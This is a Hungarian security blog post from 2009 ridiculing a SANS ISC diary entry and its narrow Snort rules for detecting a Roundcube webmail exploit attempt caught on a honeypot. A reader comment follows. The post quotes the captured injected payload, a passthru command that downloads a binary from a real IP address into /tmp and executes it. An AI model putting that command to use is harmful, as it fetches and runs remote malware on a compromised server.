Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

A mézesbödön és az együgyű medvebocsok

2009.01.20. 17:03 | buherator | 1 komment

Ezt Hungertől kaptam tegnap:

a múlt hét vicce díját számomra az a pont egy hetes bejegyzés nyeri (
http://isc.sans.org/diary.html?storyid=5686 ), ahol a SANS ISC egyik
olvasója nagyban ecseteli (az oldal vezetői pedig le is közlik), hogy
milyen ügyesen megfogtak, kollégája és a feállított honeypotjaik
segítségével egy próbálkozást, amely a karácsony óta publikusan
elérhető roundcube webmail exploitomon alapult.

A script kiddieket kifigurázó, magukat minden bizonnyal többre tartó
"szakemberek" végül olyan snort IPS szabályokkal állnak elő, amelyek
csak egy bizonyos IP címről érkező próbálkozást jeleznek és csak ha
ugyanolyan módon összeállított parancsokat tartalmaznak [ passthru("cd
/tmp;wget 85.214.64.225/wcube;chmod +x wcube;./wcube >/dev/null
2>/dev/null &"); ].

A timestamp alapján is egyértelműen látszik, hogy nem egy automatizált
támadásról van szó, így annak esélye, hogy ezzel a szabállyal
megfognak bárhol máshol még egy próbálkozást, gyakorlatilag nulla,
hisz elég akár csak egy plusz szóköz az injektált kódba és a snort
rule-ban található feltételek máris nem teljesülnek.

Tanulság: Ha nem rendelkezel az out-of-box gondolkodás képességével,
akkor az se segít, ha fut nálad egy snort IPS... :)

Címkék: móka ips az olvasó ír snort

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

synapse · http://www.synsecblog.com 2009.01.21. 14:06:31

Pattern matching FTW

Hogy is volt az a hackerek vs szakemberek? :D

synapse